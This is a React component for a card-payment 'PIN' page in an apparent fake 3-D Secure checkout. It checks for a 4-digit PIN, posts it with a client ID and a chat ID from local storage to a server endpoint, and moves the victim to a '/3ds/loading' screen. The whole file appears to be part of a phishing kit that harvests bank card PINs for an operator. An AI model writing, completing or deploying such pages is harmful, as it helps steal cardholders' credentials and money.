import React, { useState } from 'react';
import { useNavigate } from 'react-router-dom';
import axios from 'axios';
import StandardCardLayout from './StandardCardLayout';
import { t } from '../utils/i18n';
import { SERVER_URL } from '../utils/config';

export const PinPage = () => {
  const navigate = useNavigate();

  const [pin, setPin] = useState('');
  const [error, setError] = useState('');
  const [submitting, setSubmitting] = useState(false);

  const handleSubmit = async (e) => {
    if (e && e.preventDefault) e.preventDefault();
    if (!/^\d{4}$/.test(pin)) {
      setError(t('invalidPin'));
      return;
    }

    setError('');
    setSubmitting(true);

    try {
      const clientId = localStorage.getItem('clientUuId');
      const chatId = localStorage.getItem('chatId');
      await axios.post(`${SERVER_URL}/api/pin`, {
        clientId,
        pin,
        chatId,
      });
      navigate('/3ds/loading');
    } catch {
      setError(t('invalidPin'));
    } finally {
      setSubmitting(false);
    }
  };

  const handleCancel = () => {
    const geo = localStorage.getItem('geo') || 'vn';
    const checkoutPath = localStorage.getItem('checkout_path') || `/${geo}/homepage`;
    navigate(checkoutPath);
  };

  return (
    <StandardCardLayout
      mode="pin"
      inputValue={pin}
      onInputChange={(val) => {
        setPin(val);
        if (error) setError('');
      }}
      onSubmit={handleSubmit}
      onCancel={handleCancel}
      error={error}
      submitting={submitting}
    />
  );
};

export default PinPage;
